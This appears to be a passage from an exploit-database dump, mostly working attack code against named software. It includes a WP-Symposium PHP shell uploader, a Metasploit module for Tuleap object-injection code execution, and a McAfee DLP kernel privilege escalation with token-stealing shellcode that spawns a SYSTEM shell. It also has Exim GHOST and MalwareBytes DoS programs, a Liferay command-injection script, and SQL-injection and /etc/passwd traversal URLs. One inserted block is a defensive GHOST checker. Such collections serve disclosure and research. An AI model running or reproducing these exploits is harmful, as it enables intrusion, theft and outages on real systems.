   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)

   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
   L.append('Content-Type: %s' % get_content_type(payloadname))
   L.append('')
   L.append(payloadcontent)
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body

banner = """
  ___ ___               __
 |   Y   .-----.----.--|  .-----.----.-----.-----.-----.
 |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|
 |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|
 |:      |                |__|
 |::.|:. |
 `--- ---'
  ___ ___ _______        _______                                  __
 |   Y   |   _   |______|   _   .--.--.--------.-----.-----.-----|__.--.--.--------.
 |.  |   |.  1   |______|   1___|  |  |        |  _  |  _  |__ --|  |  |  |        |
 |. / \  |.  ____|      |____   |___  |__|__|__|   __|_____|_____|__|_____|__|__|__|
 |:      |:  |          |:  1   |_____|        |__|
 |::.|:. |::.|          |::.. . |
 `--- ---`---'          `-------'
                                                              Wp-Symposium
                                                      Sh311 Upl04d Vuln3r4b1l1ty
                                                                v14.11

                                 Written by:

                               Claudio Viviani

                            http://www.homelab.it

                               info@homelab.it
                           homelabit@protonmail.ch

                      https://www.facebook.com/homelabit
                        https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
             https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)

payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout

print(banner)

socket.setdefaulttimeout(timeout)

url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'

content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

randDirName = id_generator()
randShellName = id_generator()

bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }

try:
    req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
    response = urllib2.urlopen(req)
    read = response.read()

    if "error" in read or read == "0" or read == "":
       print("[X] Upload Failed :(")
    else:
       print("[!] Shell Uploaded")
       print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")

except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tuleap PHP Unserialize Code Execution',
      'Description'    => %q{
        This module exploits a PHP object injection vulnerability in Tuleap <= 7.6-4 which could be
        abused to allow authenticated users to execute arbitrary code with the permissions of the
        web server. The dangerous unserialize() call exists in the 'src/www/project/register.php'
        file. The exploit abuses the destructor method from the Jabbex class in order to reach a
        call_user_func_array() call in the Jabber class and call the fetchPostActions() method from
        the Transition_PostAction_FieldFactory class to execute PHP code through an eval() call. In
        order to work, the target must have the 'sys_create_project_in_one_step' option disabled.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'EgiX',
      'References'     =>
        [
          ['CVE', '2014-8791'],
          ['OSVDB', '115128'],
          ['URL', 'http://karmainsecurity.com/KIS-2014-13'],
          ['URL', 'https://tuleap.net/plugins/tracker/?aid=7601']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Generic (PHP Payload)', {}]],
      'DisclosureDate' => 'Nov 27 2014',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The base path to the web application", "/"]),
        OptString.new('USERNAME', [true, "The username to authenticate with" ]),
        OptString.new('PASSWORD', [true, "The password to authenticate with" ]),
        OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),
        Opt::RPORT(443)
      ], self.class)
  end

  def check
    flag = rand_text_alpha(rand(10)+20)
    res = exec_php("print #{flag};")

    if res and res.body and res.body.to_s =~ /#{flag}/
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def do_login()
    print_status("#{peer} - Logging in...")

    username = datastore['USERNAME']
    password = datastore['PASSWORD']

    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'account/login.php'),
      'vars_post' => {'form_loginname' => username, 'form_pw' => password}
    })

    unless res && res.code == 302
      fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}")
    end

    print_status("#{peer} - Login successful with #{username}:#{password}")
    res.get_cookies
  end

  def exec_php(php_code)
    session_cookies = do_login()

    chain =  'O:6:"Jabbex":2:{S:15:"\00Jabbex\00handler";O:12:"EventHandler":1:{S:27:"\00EventHandler\00authenticated";b:1;}'
    chain << 'S:11:"\00Jabbex\00jab";O:6:"Jabber":3:{S:8:"_use_log";i:1;S:11:"_connection";O:5:"Chart":0:{}S:15:"_event_handlers";'
    chain << 'a:1:{S:9:"debug_log";a:2:{i:0;O:34:"Transition_PostAction_FieldFactory":1:{S:23:"\00*\00post_actions_classes";'
    chain << 'a:1:{i:0;S:52:"1;eval(base64_decode($_SERVER[HTTP_PAYLOAD]));die;//";}}i:1;S:16:"fetchPostActions";}}}}'

    send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'project/register.php'),
      'cookie'    => session_cookies,
      'vars_post' => {'data' => chain},
      'headers'   => {'payload' => Rex::Text.encode_base64(php_code)}
    }, 3)
  end

  def exploit
    print_status("#{peer} - Exploiting the PHP object injection...")
    exec_php(payload.encoded)
  end
end
            
/*

Exploit Title    - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
Date             - 19th January 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.malwarebytes.org
Tested Version   - 1.03.1.1220, 1.04.1.1012
Driver Version   - no version set - mbae.sys
Tested on OS     - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB            - http://www.osvdb.org/show/osvdb/114249
CVE ID           - CVE-2014-100039
Vendor fix url   - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
Fixed version    - 1.05
Fixed driver ver - no version set

*/



#include <stdio.h>
#include <conio.h>    /* getch() */
#include <windows.h>

#define BUFSIZE 25


int main(int argc, char *argv[]) 
{
    HANDLE         hDevice;
    char           devhandle[MAX_PATH];
    DWORD          dwRetBytes = 0;
    BYTE           sizebytes[4] = "\xff\xff\xff\x00";   
    BYTE           *inbuffer;


    printf("-------------------------------------------------------------------------------\n");
    printf("        MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS            \n");
    printf("             Tested on Windows XP SP3/Windows 7 SP1 (32bit)                    \n");
    printf("-------------------------------------------------------------------------------\n\n");

    sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");

    inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    memset(inbuffer, 0x41, BUFSIZE);
    memcpy(inbuffer, sizebytes, sizeof(sizebytes));

    printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else 
    {
        printf("\n[+] Open %s device successful", devhandle);
    }	

    printf("\n[~] Press any key to DoS . . .");
    getch();

    DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);

    printf("\n[+] DoS buffer sent\n\n");
 
    CloseHandle(hDevice);

    return 0;
}
            
source: https://www.securityfocus.com/bid/48689/info

The 'com_hospital' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_hospital&view=departments&Itemid=21&did=[SQL INJECTION] 
            
source: https://www.securityfocus.com/bid/48688/info

The Juicy Gallery component for Joomla! is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_juicy&task=showComments&picId=[EXPLOIT] 
            
source: https://www.securityfocus.com/bid/48687/info

The Auerswald USB Device Driver for the Linux kernel is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Attackers can exploit this issue to execute arbitrary code with superuser privileges, facilitating the complete compromise of affected computers. Failed exploit attempts will likely crash the kernel, denying service to legitimate users.

Linux kernel 2.6.26 is vulnerable; prior versions may also be affected. 

0xbf, 0x09, /*  u16 idVendor; */
0xc0, 0x00, /*  u16 idProduct; */
0x10, 0x42, /*  u16 bcdDevice */

case 1:
    /* serial number */
    ret = set_usb_string(data, "");
    break;
case 2:
    ret = set_usb_string(data, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
            
source: https://www.securityfocus.com/bid/48685/info

The 'Foto' component for Joomla! is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_foto&task=categoria&id_categoria=-4+union+select+1,password,username,4,5,6,7+from+jos_users-- 
            
/*

Exploit Title    - McAfee Data Loss Prevention Endpoint Arbitrary Write Privilege Escalation
Date             - 29th January 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - http://www.mcafee.com
Tested Version   - 9.3.200.23
Driver Version   - 9.3.200.23 - hdlpctrl.sys
Tested on OS     - 32bit Windows XP SP3 and Windows 2003 Server SP2
OSVDB            - http://www.osvdb.org/show/osvdb/117345
CVE ID           - CVE-2015-1305
Vendor fix url   - https://kc.mcafee.com/corporate/index?page=content&id=SB10097
Fixed version    - 9.3.400
Fixed driver ver - 

*/


#include <stdio.h>
#include <string.h>   // memset, strcpy_s, strrchr
#include <conio.h>    // getch
#include <windows.h>

#define BUFSIZE 4096


typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
     PVOID   Unknown1;
     PVOID   Unknown2;
     PVOID   Base;
     ULONG   Size;
     ULONG   Flags;
     USHORT  Index;
     USHORT  NameLength;
     USHORT  LoadCount;
     USHORT  PathLength;
     CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
 
typedef struct _SYSTEM_MODULE_INFORMATION {
     ULONG   Count;
     SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS { 
     SystemModuleInformation = 11,
     SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
     SYSTEM_INFORMATION_CLASS SystemInformationClass,
     PVOID SystemInformation,
     ULONG SystemInformationLength,
     PULONG ReturnLength);

typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
     DWORD ProfileSource, 
     PULONG Interval);

typedef void (*FUNCTPTR)(); 



// Windows XP SP3

#define XP_KPROCESS 0x44      // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN    0xc8      // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID     0x84      // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS  0x88      // Offset to ActiveProcessLinks _EPROCESS struct

// Windows Server 2003

#define W2K3_KPROCESS 0x38      // Offset to _KPROCESS from a _ETHREAD struct
#define W2K3_TOKEN    0xd8      // Offset to TOKEN from the _EPROCESS struct
#define W2K3_UPID     0x94      // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W2K3_APLINKS  0x98      // Offset to ActiveProcessLinks _EPROCESS struct


BYTE token_steal_xp[] =
{
  0x52,                                                  // push edx                       Save edx on the stack
  0x53,                                                  // push ebx                       Save ebx on the stack
  0x33,0xc0,                                             // xor eax, eax                   eax = 0
  0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                    // mov eax, fs:[eax+124h]         Retrieve ETHREAD
  0x8b,0x40,XP_KPROCESS,                                 // mov eax, [eax+XP_KPROCESS]     Retrieve _KPROCESS
  0x8b,0xc8,                                             // mov ecx, eax
  0x8b,0x98,XP_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+XP_TOKEN]        Retrieves TOKEN
  0x8b,0x80,XP_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+XP_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
  0x81,0xe8,XP_APLINKS,0x00,0x00,0x00,                   // sub eax, XP_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
  0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+XP_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
  0x75,0xe8,                                             // jne                     ---- 
  0x8b,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+XP_TOKEN]        Retrieves TOKEN and stores on EDX
  0x8b,0xc1,                                             // mov eax, ecx                   Retrieves KPROCESS stored on ECX
  0x89,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov [eax+XP_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS
  0x5b,                                                  // pop ebx                        Restores ebx
  0x5a,                                                  // pop edx                        Restores edx
  0xc2,0x08                                              // ret 8    
};


BYTE token_steal_w2k3[] =
{
  0x52,                                                  // push edx                         Save edx on the stack
  0x53,                                                  // push ebx                         Save ebx on the stack
  0x33,0xc0,                                             // xor eax, eax                     eax = 0
  0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                    // mov eax, fs:[eax+124h]           Retrieve ETHREAD
  0x8b,0x40,W2K3_KPROCESS,                               // mov eax, [eax+W2K3_KPROCESS]     Retrieve _KPROCESS
  0x8b,0xc8,                                             // mov ecx, eax
  0x8b,0x98,W2K3_TOKEN,0x00,0x00,0x00,                   // mov ebx, [eax+W2K3_TOKEN]        Retrieves TOKEN
  0x8b,0x80,W2K3_APLINKS,0x00,0x00,0x00,                 // mov eax, [eax+W2K3_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
  0x81,0xe8,W2K3_APLINKS,0x00,0x00,0x00,                 // sub eax, W2K3_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
  0x81,0xb8,W2K3_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,// cmp [eax+W2K3_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
  0x75,0xe8,                                             // jne                       ---- 
  0x8b,0x90,W2K3_TOKEN,0x00,0x00,0x00,                   // mov edx, [eax+W2K3_TOKEN]        Retrieves TOKEN and stores on EDX
  0x8b,0xc1,                                             // mov eax, ecx                     Retrieves KPROCESS stored on ECX
  0x89,0x90,W2K3_TOKEN,0x00,0x00,0x00,                   // mov [eax+W2K3_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS
  0x5b,                                                  // pop ebx                          Restores ebx
  0x5a,                                                  // pop edx                          Restores edx
  0xc2,0x08                                              // ret 8                            Away from the kernel
};



DWORD HalDispatchTableAddress() 
{
    _NtQuerySystemInformation    NtQuerySystemInformation;
    PSYSTEM_MODULE_INFORMATION   pModuleInfo;
    DWORD                        HalDispatchTable;
    CHAR                         kFullName[256];
    PVOID                        kBase = NULL;
    LPSTR                        kName;
    HMODULE                      Kernel;
    FUNCTPTR                     Hal;
    ULONG                        len;
    NTSTATUS                     status;


    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
 	
    if (!NtQuerySystemInformation)
    {
        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
        return -1;  
    }

    status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);

    if (!status) 
    {
        printf("[-] An error occurred while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
        return -1;
    }
		
    pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);

    if(pModuleInfo == NULL)
    {
        printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
        return -1;
    }

    status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
	
    memset(kFullName, 0x00, sizeof(kFullName));
    strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
    kBase = pModuleInfo->Module[0].Base;

    printf("[i] Kernel base name %s\n", kFullName);
    kName = strrchr(kFullName, '\\');

    Kernel = LoadLibraryA(++kName);

    if(Kernel == NULL) 
    {
        printf("[-] Failed to load kernel base\n\n");
        return -1;
    }

    Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");

    if(Hal == NULL)
    {
        printf("[-] Failed to find HalDispatchTable\n\n");
        return -1;
    }
    
    printf("[i] HalDispatchTable address 0x%08x\n", Hal);	
    printf("[i] Kernel handle 0x%08x\n", Kernel);
    printf("[i] Kernel base address 0x%08x\n", kBase);          

    HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);

    printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);

    if(!HalDispatchTable)
    {
        printf("[-] Failed to calculate HalDispatchTable\n\n");
        return -1;
    }

    return HalDispatchTable;
}


int GetWindowsVersion()
{
    int v = 0;
    DWORD version = 0, minVersion = 0, majVersion = 0;

    version = GetVersion();

    minVersion = (DWORD)(HIBYTE(LOWORD(version)));
    majVersion = (DWORD)(LOBYTE(LOWORD(version)));

    if (minVersion == 1 && majVersion == 5) v = 1;  // Windows XP
    if (minVersion == 1 && majVersion == 6) v = 2;  // Windows 7
    if (minVersion == 2 && majVersion == 5) v = 3;  // Windows Server 2003

    return v;
}


void spawnShell()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;


    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);

    si.cb          = sizeof(si); 
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;

    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
    {
        printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
        return;
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}


int main(int argc, char *argv[]) 
{

    _NtQueryIntervalProfile     NtQueryIntervalProfile;
    LPVOID                      input[1] = {0};   
    LPVOID                      addrtoshell;
    HANDLE                      hDevice;
    DWORD                       dwRetBytes = 0;
    DWORD                       HalDispatchTableTarget;             
    ULONG                       time = 0;
    char                        devhandle[MAX_PATH];   // plain char: passed to sprintf() and CreateFile() as a C string



    printf("-------------------------------------------------------------------------------\n");
    printf("McAfee Data Loss Prevention Endpoint (hdlpctrl.sys) Arbitrary Write EoP Exploit\n");
    printf("           Tested on Windows XP SP3/Windows Server 2003 SP2 (32bit)            \n");
    printf("-------------------------------------------------------------------------------\n\n");


    if (GetWindowsVersion() == 1) 
    {
        printf("[i] Running Windows XP\n");
    }

    if (GetWindowsVersion() == 3) 
    {
        printf("[i] Running Windows Server 2003\n");
    }

    if (GetWindowsVersion() == 0) 
    {
        printf("[i] Exploit not supported on this OS\n\n");
        return -1;
    }  

    sprintf(devhandle, "\\\\.\\%s", "devbkctrl");

    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
 	
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
        return -1;  
    }
   
    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(addrtoshell == NULL)
    {
        printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
        return -1;
    }
    printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);

    memset(addrtoshell, 0x90, BUFSIZE);

    if (GetWindowsVersion() == 1) 
    {
        memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
        printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
    }

    if (GetWindowsVersion() == 3) 
    {
        memcpy(addrtoshell, token_steal_w2k3, sizeof(token_steal_w2k3));
        printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w2k3));
    }

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
        return -1;
    }
    else 
    {
        printf("[+] Open %s device successful\n", devhandle);
    }

    HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
    printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);

    input[0] = addrtoshell;  // input buffer contents gets written to our output buffer address
                    
    printf("[+] Input buffer contents %08x\n", input[0]);
 	
    printf("[~] Press any key to send Exploit  . . .\n");
    getch();

    DeviceIoControl(hDevice, 0x00224014, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);

    printf("[+] Buffer sent\n");
    CloseHandle(hDevice);

    printf("[+] Spawning SYSTEM Shell\n");
    NtQueryIntervalProfile(2, &time);
    spawnShell();

    return 0;
}
            
# Exploit Title: [Exim ESMTP GHOST DoS PoC Exploit]
# Date: [1/29/2015]
# Exploit Author: [1N3]
# Vendor Homepage: [www.exim.org]
# Version: [4.80 or less]
# Tested on: [debian-7-7-64b]
# CVE : [2015-0235]

#!/usr/bin/python
# Exim ESMTP DoS Exploit by 1N3 v20150128
# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow
# http://crowdshield.com
#
# USAGE: python ghost-smtp-dos.py <ip> <port>
#
# Escape character is '^]'.
# 220 debian-7-7-64b ESMTP Exim 4.80 ...
# HELO
# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
# 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
# Connection closed by foreign host.
#
# user () debian-7-7-64b:~$ dmesg
# ...
# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in
# libc-2.13.so[7fabef2a2000+182000]

import socket
import time
import sys, getopt

def main(argv):
    argc = len(argv)

    if argc <= 2:   # both host and port are required below
            print "usage: %s <host> <port>" % (argv[0])
            sys.exit(0)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
             "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

    target = argv[1] # SET TARGET
    port = argv[2] # SET PORT

    print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
    print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((target,int(port)))
    data = s.recv(1024)
    print "CONNECTION: " +data
    s.send('HELO ' + buffer + '\r\n')
    data = s.recv(1024)
    print "received: " +data
    s.send('EHLO ' + buffer + '\r\n')
    data = s.recv(1024)
    print "received: " +data
    s.close()

main(sys.argv) 
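The DoS above relies on CVE-2015-0235 in glibc's gethostbyname() family. The following local check, added here and not part of 1N3's PoC, is the Qualys-style test from the original advisory: an all-digit name sized to exactly fill a 1024-byte result buffer is passed to gethostbyname_r(); a patched glibc reserves one extra pointer and refuses with ERANGE, a vulnerable one overruns the buffer into the canary placed after it. It assumes a glibc-based Linux host; on other libcs the result is reported as inconclusive.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>

#define CANARY "in_the_coal_mine"

/* Result buffer handed to gethostbyname_r(), followed by a canary that a
 * vulnerable __nss_hostname_digits_dots() overruns by sizeof(char *). */
static struct {
    char buffer[1024];
    char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

/* Returns 1 if the local glibc is vulnerable to GHOST, 0 if it is patched,
 * -1 if the libc took neither path (e.g. not glibc: inconclusive). */
int ghost_check(void)
{
    struct hostent resbuf;
    struct hostent *result = NULL;
    int herrno = 0;
    /* Name length chosen so that sizeof(host_addr) (16) + two address
     * pointers + name + NUL exactly fills the buffer; the fixed code also
     * reserves sizeof(*h_alias_ptr) and therefore fails with ERANGE. */
    size_t len = sizeof(temp.buffer) - 16 * sizeof(unsigned char)
                 - 2 * sizeof(char *) - 1;
    char name[sizeof(temp.buffer)];

    memset(temp.buffer, 0, sizeof(temp.buffer));
    memcpy(temp.canary, CANARY, sizeof(CANARY));
    memset(name, '0', len);          /* all digits: takes the digits-dots path */
    name[len] = '\0';

    int retval = gethostbyname_r(name, &resbuf, temp.buffer,
                                 sizeof(temp.buffer), &result, &herrno);

    if (strcmp(temp.canary, CANARY) != 0)
        return 1;                    /* canary clobbered: the overflow happened */
    if (retval == ERANGE)
        return 0;                    /* bounds check rejected the request */
    return -1;
}

int main(void)
{
    int r = ghost_check();
    printf("%s\n", r == 1 ? "vulnerable" : r == 0 ? "not vulnerable" : "inconclusive");
    return r == 0 ? 0 : 1;
}
```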
            
source: https://www.securityfocus.com/bid/47552/info

Nuke Evolution Xtreme is prone to a local file-include vulnerability and an SQL-injection vulnerability.

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process.

The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Nuke Evolution Xtreme 2.0 is vulnerable; other versions may also be affected. 


http://www.example.com/[path]/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5--
http://www.example.com/[path]/modules.php?name=News&file=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/modules.php?name=Private_Messages&file=../../../../../../../../../../etc/passwd%00 
            
#!/bin/sh

# Exploit title: Liferay Portal 7.0.0 M1, 7.0.0 M2, 7.0.0 M3 RCE
# Date: 11/16/2014
# Exploit author: drone (@dronesec)
# Vendor homepage: http://www.liferay.com/
# Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip
# Version: 7.0.0 M1, 7.0.0 M2, 7.0.0 M3
# Fixed in: 7.0.3
# Tested on: Windows 7

# Pre-auth command injection using an exposed Apache Felix, 
# exposed by default on all Liferay Portal 7.0 installs.
#
# ./liferay_portal7.sh 192.168.1.1 "cmd.exe /C calc.exe"
#


(echo open $1 11311
sleep 1
echo system:getproperties
sleep 1
echo exec \"$2\"
sleep 1
) | telnet
            
source: https://www.securityfocus.com/bid/47542/info

Dolibarr is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the affected application. Information harvested may aid in further attacks.

